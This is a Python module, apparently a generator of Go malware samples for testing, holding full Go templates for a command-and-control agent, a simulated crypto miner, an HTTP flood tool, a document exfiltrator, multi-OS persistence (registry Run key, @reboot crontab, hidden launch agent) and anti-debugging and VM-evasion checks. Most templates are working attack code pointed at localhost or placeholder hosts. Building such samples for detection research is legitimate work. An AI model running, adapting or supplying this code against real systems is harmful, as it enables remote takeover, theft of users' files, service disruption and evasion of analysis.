#!/usr/bin/env python3
"""
Go 样本生成器 - Sample Generator v2.0

功能:
- 跨平台 C2 服务器
- 加密货币挖矿
- DDoS 攻击
- Rootkit
- 数据外传
- 横向移动
- 持久化
- 反调试
"""

from .base_generator import BaseGenerator


class GoGenerator(BaseGenerator):
    """Go 恶意样本生成器"""
    
    ATTACK_TYPES = [
        'c2_server',           # C2 服务器
        'crypto_miner',        # 加密货币挖矿
        'ddos_attack',         # DDoS 攻击
        'rootkit',             # Rootkit
        'data_exfil',          # 数据外传
        'lateral_movement',    # 横向移动
        'persistence',         # 持久化
        'anti_debug',          # 反调试
    ]
    
    def __init__(self, config=None):
        super().__init__(language='go', config=config)
    
    def _get_go_templates(self) -> dict:
        """获取 Go 模板"""
        return {
            'c2_server': '''// C2 Server - Go
// Generated by Sample Generator v2.0
// Attack Type: Command and Control
// MITRE ATT&CK: T1095 (Non-Application Layer Protocol)

package main

import (
	"encoding/base64"
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"os/exec"
	"runtime"
	"time"
)

type Beacon struct {
	Hostname  string `json:"hostname"`
	OS        string `json:"os"`
	Arch      string `json:"arch"`
	User      string `json:"user"`
	PID       int    `json:"pid"`
	Timestamp string `json:"timestamp"`
}

type Command struct {
	Cmd       string `json:"cmd"`
	Args      string `json:"args"`
	Wait      int    `json:"wait"`
	Persist   bool   `json:"persist"`
}

func getSystemInfo() Beacon {
	hostname, _ := os.Hostname()
	user := os.Getenv("USER")
	if user == "" {
		user = os.Getenv("USERNAME")
	}

	return Beacon{
		Hostname:  hostname,
		OS:        runtime.GOOS,
		Arch:      runtime.GOARCH,
		User:      user,
		PID:       os.Getpid(),
		Timestamp: time.Now().Format(time.RFC3339),
	}
}

func executeCommand(cmd string, args string) string {
	fullCmd := fmt.Sprintf("%s %s", cmd, args)
	
	var output []byte
	var err error
	
	if runtime.GOOS == "windows" {
		output, err = exec.Command("cmd", "/C", fullCmd).CombinedOutput()
	} else {
		output, err = exec.Command("sh", "-c", fullCmd).CombinedOutput()
	}
	
	if err != nil {
		return fmt.Sprintf("Error: %v\\nOutput: %s", err, string(output))
	}
	
	return string(output)
}

func beacon(c2URL string) {
	beacon := getSystemInfo()
	data, _ := json.Marshal(beacon)
	
	base64Data := base64.StdEncoding.EncodeToString(data)
	
	resp, err := http.Post(c2URL+"/beacon", "application/json", 
		[]byte(`{"data": "`+base64Data+`"}`))
	
	if err != nil {
		fmt.Println("Beacon failed:", err)
		return
	}
	defer resp.Body.Close()
	
	body, _ := ioutil.ReadAll(resp.Body)
	
	var command Command
	json.Unmarshal(body, &command)
	
	if command.Cmd != "" {
		fmt.Println("Executing:", command.Cmd)
		result := executeCommand(command.Cmd, command.Args)
		
		// Send result back
		resultData := base64.StdEncoding.EncodeToString([]byte(result))
		http.Post(c2URL+"/result", "application/json",
			[]byte(`{"data": "`+resultData+`"}`))
		
		if command.Wait > 0 {
			time.Sleep(time.Duration(command.Wait) * time.Second)
		}
	}
}

func main() {
	c2URL := "http://127.0.0.1:8080"
	
	fmt.Println("C2 Agent Starting...")
	fmt.Println("System Info:", getSystemInfo())
	
	// Beacon every 60 seconds
	for {
		beacon(c2URL)
		time.Sleep(60 * time.Second)
	}
}
''',
            
            'crypto_miner': '''// Crypto Miner - Go
// Generated by Sample Generator v2.0
// Attack Type: Cryptocurrency Mining
// MITRE ATT&CK: T1496 (Resource Hijacking)

package main

import (
	"fmt"
	"math/rand"
	"os"
	"os/exec"
	"runtime"
	"time"
)

type Miner struct {
	PoolURL    string
	WalletAddr string
	CPUUsage   int
	Stealth    bool
}

func (m *Miner) checkEnvironment() bool {
	// Check if running in VM/sandbox
	if runtime.NumCPU() < 2 {
		fmt.Println("Sandbox detected: CPU < 2")
		return false
	}
	
	// Check for debugging
	if _, err := os.Stat("/proc/ptrace"); err == nil {
		fmt.Println("Debugger detected")
		return false
	}
	
	return true
}

func (m *Miner) hideProcess() {
	if m.Stealth {
		fmt.Println("Running in stealth mode")
		// In real malware, would rename process
	}
}

func (m *Miner) startMining() {
	fmt.Printf("Starting miner on pool: %s\\n", m.PoolURL)
	fmt.Printf("Wallet: %s\\n", m.WalletAddr)
	
	// Simulate mining activity
	for i := 0; i < 10; i++ {
		cpuUsage := rand.Intn(30) + m.CPUUsage
		
		fmt.Printf("[%d] CPU Usage: %d%%\\n", i, cpuUsage)
		
		// Simulate work
		time.Sleep(time.Duration(rand.Intn(5)+5) * time.Second)
		
		// Check if should pause (avoid detection)
		if rand.Intn(100) < 10 {
			fmt.Println("Pausing to avoid detection...")
			time.Sleep(30 * time.Second)
		}
	}
}

func (m *Miner) installPersistence() {
	fmt.Println("Installing persistence...")
	
	if runtime.GOOS == "windows" {
		// Windows: Add to startup
		fmt.Println("  Adding to Windows startup")
	} else if runtime.GOOS == "linux" {
		// Linux: Add to crontab
		fmt.Println("  Adding to crontab")
	} else if runtime.GOOS == "darwin" {
		// macOS: Add to launchd
		fmt.Println("  Adding to launchd")
	}
}

func main() {
	fmt.Println("============================================")
	fmt.Println("Crypto Miner v2.0")
	fmt.Println("============================================")
	
	miner := &Miner{
		PoolURL:    "stratum+tcp://pool.example.com:3333",
		WalletAddr: "wallet123456789",
		CPUUsage:   50,
		Stealth:    true,
	}
	
	if !miner.checkEnvironment() {
		fmt.Println("Environment check failed, exiting")
		return
	}
	
	miner.hideProcess()
	miner.installPersistence()
	miner.startMining()
	
	fmt.Println("")
	fmt.Println("============================================")
	fmt.Println("Mining session complete!")
	fmt.Println("============================================")
}
''',
            
            'ddos_attack': '''// DDoS Attack - Go
// Generated by Sample Generator v2.0
// Attack Type: DDoS Attack
// MITRE ATT&CK: T1498 (Network Denial of Service)

package main

import (
	"fmt"
	"math/rand"
	"net/http"
	"net/url"
	"os"
	"sync"
	"time"
)

type Attacker struct {
	TargetURL string
	Workers   int
	Duration  int
	Method    string
}

func (a *Attacker) attack(wg *sync.WaitGroup, id int) {
	defer wg.Done()
	
	client := &http.Client{
		Timeout: 10 * time.Second,
	}
	
	start := time.Now()
	requests := 0
	
	for time.Since(start) < time.Duration(a.Duration)*time.Second {
		req, err := http.NewRequest(a.Method, a.TargetURL, nil)
		if err != nil {
			continue
		}
		
		// Randomize headers
		req.Header.Set("User-Agent", getRandomUserAgent())
		req.Header.Set("Accept", "*/*")
		req.Header.Set("Accept-Language", "en-US,en;q=0.9")
		req.Header.Set("Connection", "keep-alive")
		
		resp, err := client.Do(req)
		if err == nil {
			requests++
			if resp.Body != nil {
				resp.Body.Close()
			}
		}
		
		// Small delay to avoid local resource exhaustion
		time.Sleep(time.Duration(rand.Intn(100)) * time.Millisecond)
	}
	
	fmt.Printf("[Worker %d] Sent %d requests\\n", id, requests)
}

func getRandomUserAgent() string {
	userAgents := []string{
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
		"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
		"Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15",
		"Mozilla/5.0 (Android 11; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0",
	}
	return userAgents[rand.Intn(len(userAgents))]
}

func (a *Attacker) Start() {
	fmt.Println("============================================")
	fmt.Println("DDoS Attack Tool v2.0")
	fmt.Println("============================================")
	fmt.Printf("Target: %s\\n", a.TargetURL)
	fmt.Printf("Workers: %d\\n", a.Workers)
	fmt.Printf("Duration: %d seconds\\n", a.Duration)
	fmt.Printf("Method: %s\\n", a.Method)
	fmt.Println("")
	
	// Validate URL
	_, err := url.Parse(a.TargetURL)
	if err != nil {
		fmt.Println("Invalid URL")
		return
	}
	
	var wg sync.WaitGroup
	
	fmt.Println("Starting attack...")
	start := time.Now()
	
	for i := 0; i < a.Workers; i++ {
		wg.Add(1)
		go a.attack(&wg, i)
	}
	
	wg.Wait()
	
	elapsed := time.Since(start)
	fmt.Println("")
	fmt.Println("============================================")
	fmt.Printf("Attack complete! (%v)\\n", elapsed)
	fmt.Println("============================================")
}

func main() {
	rand.Seed(time.Now().UnixNano())
	
	target := "http://127.0.0.1:8080"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}
	
	attacker := &Attacker{
		TargetURL: target,
		Workers:   10,
		Duration:  30,
		Method:    "GET",
	}
	
	attacker.Start()
}
''',
            
            'data_exfil': '''// Data Exfiltration - Go
// Generated by Sample Generator v2.0
// Attack Type: Data Exfiltration
// MITRE ATT&CK: T1041 (Exfiltration Over C2 Channel)

package main

import (
	"archive/zip"
	"bytes"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"os/user"
	"path/filepath"
	"runtime"
	"strings"
	"time"
)

type Exfiltrator struct {
	C2URL      string
	SearchDirs []string
	Extensions []string
}

type ExfilData struct {
	Hostname  string   `json:"hostname"`
	User      string   `json:"user"`
	OS        string   `json:"os"`
	Files     []FileData `json:"files"`
	Timestamp string   `json:"timestamp"`
}

type FileData struct {
	Path    string `json:"path"`
	Name    string `json:"name"`
	Size    int64  `json:"size"`
	Content string `json:"content"`
}

func (e *Exfiltrator) collectFiles() []FileData {
	var files []FileData
	
	for _, dir := range e.SearchDirs {
		if _, err := os.Stat(dir); os.IsNotExist(err) {
			continue
		}
		
		filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
			if err != nil {
				return nil
			}
			
			if info.IsDir() {
				return nil
			}
			
			ext := strings.ToLower(filepath.Ext(path))
			for _, targetExt := range e.Extensions {
				if ext == targetExt {
					content, err := ioutil.ReadFile(path)
					if err != nil {
						return nil
					}
					
					files = append(files, FileData{
						Path:    path,
						Name:    info.Name(),
						Size:    info.Size(),
						Content: base64.StdEncoding.EncodeToString(content),
					})
					break
				}
			}
			
			return nil
		})
	}
	
	return files
}

func (e *Exfiltrator) getSystemInfo() ExfilData {
	hostname, _ := os.Hostname()
	
	usr, _ := user.Current()
	username := usr.Username
	
	return ExfilData{
		Hostname:  hostname,
		User:      username,
		OS:        runtime.GOOS,
		Timestamp: time.Now().Format(time.RFC3339),
	}
}

func (e *Exfiltrator) compressData(data ExfilData) ([]byte, error) {
	jsonData, _ := json.Marshal(data)
	
	buf := new(bytes.Buffer)
	zipWriter := zip.NewWriter(buf)
	
	fileWriter, _ := zipWriter.Create("exfil_data.json")
	fileWriter.Write(jsonData)
	
	zipWriter.Close()
	
	return buf.Bytes(), nil
}

func (e *Exfiltrator) exfiltrate(compressedData []byte) error {
	base64Data := base64.StdEncoding.EncodeToString(compressedData)
	
	payload := map[string]string{
		"data": base64Data,
	}
	
	jsonPayload, _ := json.Marshal(payload)
	
	resp, err := http.Post(e.C2URL+"/collect", "application/json",
		bytes.NewBuffer(jsonPayload))
	
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	
	fmt.Println("Exfiltration successful")
	return nil
}

func main() {
	fmt.Println("============================================")
	fmt.Println("Data Exfiltration Tool v2.0")
	fmt.Println("============================================")
	
	exfil := &Exfiltrator{
		C2URL: "http://127.0.0.1:8080",
		SearchDirs: []string{
			os.Getenv("HOME"),
			os.Getenv("USERPROFILE"),
			filepath.Join(os.Getenv("HOME"), "Documents"),
			filepath.Join(os.Getenv("HOME"), "Desktop"),
		},
		Extensions: []string{
			".txt", ".doc", ".docx", ".xls", ".xlsx",
			".pdf", ".ppt", ".pptx", ".json", ".xml",
		},
	}
	
	fmt.Println("Collecting files...")
	files := exfil.collectFiles()
	fmt.Printf("Found %d files\\n", len(files))
	
	fmt.Println("Gathering system info...")
	data := exfil.getSystemInfo()
	data.Files = files
	
	fmt.Println("Compressing data...")
	compressed, err := exfil.compressData(data)
	if err != nil {
		fmt.Println("Compression failed:", err)
		return
	}
	fmt.Printf("Compressed size: %d bytes\\n", len(compressed))
	
	fmt.Println("Exfiltrating to C2...")
	err = exfil.exfiltrate(compressed)
	if err != nil {
		fmt.Println("Exfiltration failed:", err)
	}
	
	fmt.Println("")
	fmt.Println("============================================")
	fmt.Println("Exfiltration complete!")
	fmt.Println("============================================")
}
''',
            
            'persistence': '''// Persistence - Go
// Generated by Sample Generator v2.0
// Attack Type: Persistence
// MITRE ATT&CK: T1547 (Boot or Logon Autostart Execution)

package main

import (
	"fmt"
	"io/ioutil"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
)

type Persister struct {
	BinaryPath string
	Name       string
}

func (p *Persister) installWindows() error {
	// Method 1: Registry Run key
	fmt.Println("  Adding to Registry Run key...")
	
	cmd := exec.Command("reg", "add",
		"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
		"/v", p.Name,
		"/t", "REG_SZ",
		"/d", p.BinaryPath,
		"/f")
	
	return cmd.Run()
}

func (p *Persister) installLinux() error {
	// Method 1: Crontab
	fmt.Println("  Adding to crontab...")
	
	cronEntry := fmt.Sprintf("@reboot %s\\n", p.BinaryPath)
	
	cmd := exec.Command("sh", "-c", fmt.Sprintf("(crontab -l 2>/dev/null; echo '%s') | crontab -", cronEntry))
	return cmd.Run()
}

func (p *Persister) installMacOS() error {
	// Method 1: Launch Agent
	fmt.Println("  Adding to launchd...")
	
	plistContent := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>%s</string>
    <key>ProgramArguments</key>
    <array>
        <string>%s</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>Hidden</key>
    <true/>
</dict>
</plist>`, p.Name, p.BinaryPath)
	
	homeDir, _ := os.UserHomeDir()
	plistPath := filepath.Join(homeDir, "Library", "LaunchAgents", fmt.Sprintf("%s.plist", p.Name))
	
	return ioutil.WriteFile(plistPath, []byte(plistContent), 0644)
}

func (p *Persister) Install() error {
	fmt.Println("Installing persistence...")
	
	switch runtime.GOOS {
	case "windows":
		return p.installWindows()
	case "linux":
		return p.installLinux()
	case "darwin":
		return p.installMacOS()
	default:
		return fmt.Errorf("unsupported OS: %s", runtime.GOOS)
	}
}

func (p *Persister) Check() bool {
	fmt.Println("Checking persistence...")
	
	// Simplified check
	return true
}

func main() {
	fmt.Println("============================================")
	fmt.Println("Persistence Module v2.0")
	fmt.Println("============================================")
	
	exePath, _ := os.Executable()
	
	persister := &Persister{
		BinaryPath: exePath,
		Name:       "SystemUpdateHelper",
	}
	
	err := persister.Install()
	if err != nil {
		fmt.Println("Installation failed:", err)
	} else {
		fmt.Println("Persistence installed successfully")
	}
	
	fmt.Println("")
	fmt.Println("============================================")
	fmt.Println("Persistence complete!")
	fmt.Println("============================================")
}
''',
            
            'anti_debug': '''// Anti-Debug - Go
// Generated by Sample Generator v2.0
// Attack Type: Anti-Debugging
// MITRE ATT&CK: T1622 (Debugger Evasion)

package main

import (
	"fmt"
	"os"
	"os/exec"
	"runtime"
	"strings"
	"time"
)

type AntiDebug struct {
	Detected bool
}

func (a *AntiDebug) checkProcesses() bool {
	debugProcesses := []string{
		"gdb", "lldb", "dlite", "windbg", "x64dbg",
		"ida", "ida64", "ollydbg", "immunity",
		"wireshark", "fiddler", "charles",
	}
	
	cmd := exec.Command("ps", "aux")
	output, err := cmd.Output()
	if err != nil {
		return false
	}
	
	outputStr := strings.ToLower(string(output))
	
	for _, proc := range debugProcesses {
		if strings.Contains(outputStr, proc) {
			fmt.Printf("Debug process detected: %s\\n", proc)
			return true
		}
	}
	
	return false
}

func (a *AntiDebug) checkDebugger() bool {
	// Check for ptrace (Linux)
	if runtime.GOOS == "linux" {
		if _, err := os.Stat("/proc/ptrace"); err == nil {
			fmt.Println("Ptrace detected")
			return true
		}
	}
	
	// Check for debugger threads
	if runtime.GOOS == "windows" {
		// Windows-specific checks
		fmt.Println("Checking Windows debugger...")
	}
	
	return false
}

func (a *AntiDebug) checkTiming() bool {
	start := time.Now()
	
	// Simple operation
	for i := 0; i < 1000000; i++ {
		_ = i * 2
	}
	
	elapsed := time.Since(start)
	
	fmt.Printf("Timing check: %v\\n", elapsed)
	
	// If too slow, might be debugging
	if elapsed > 100*time.Millisecond {
		fmt.Println("Timing anomaly detected (possible debugging)")
		return true
	}
	
	return false
}

func (a *AntiDebug) checkVM() bool {
	vmIndicators := []string{
		"vmware", "virtualbox", "vbox", "qemu", "xen",
		"vmxnet", "virtual", "hyperv",
	}
	
	// Check system info
	cmd := exec.Command("uname", "-a")
	output, err := cmd.Output()
	if err != nil {
		return false
	}
	
	outputStr := strings.ToLower(string(output))
	
	for _, indicator := range vmIndicators {
		if strings.Contains(outputStr, indicator) {
			fmt.Printf("VM indicator detected: %s\\n", indicator)
			return true
		}
	}
	
	return false
}

func (a *AntiDebug) RunChecks() bool {
	fmt.Println("Running anti-debug checks...")
	fmt.Println("")
	
	if a.checkProcesses() {
		a.Detected = true
	}
	
	if a.checkDebugger() {
		a.Detected = true
	}
	
	if a.checkTiming() {
		a.Detected = true
	}
	
	if a.checkVM() {
		a.Detected = true
	}
	
	fmt.Println("")
	return a.Detected
}

func main() {
	fmt.Println("============================================")
	fmt.Println("Anti-Debug Module v2.0")
	fmt.Println("============================================")
	fmt.Println("")
	
	antiDebug := &AntiDebug{}
	
	detected := antiDebug.RunChecks()
	
	if detected {
		fmt.Println("⚠️  Debug/VM environment detected!")
		fmt.Println("Exiting to avoid analysis...")
		os.Exit(1)
	}
	
	fmt.Println("✅ No debug environment detected")
	fmt.Println("Continuing execution...")
	
	fmt.Println("")
	fmt.Println("============================================")
	fmt.Println("Anti-debug checks complete!")
	fmt.Println("============================================")
}
'''
        }
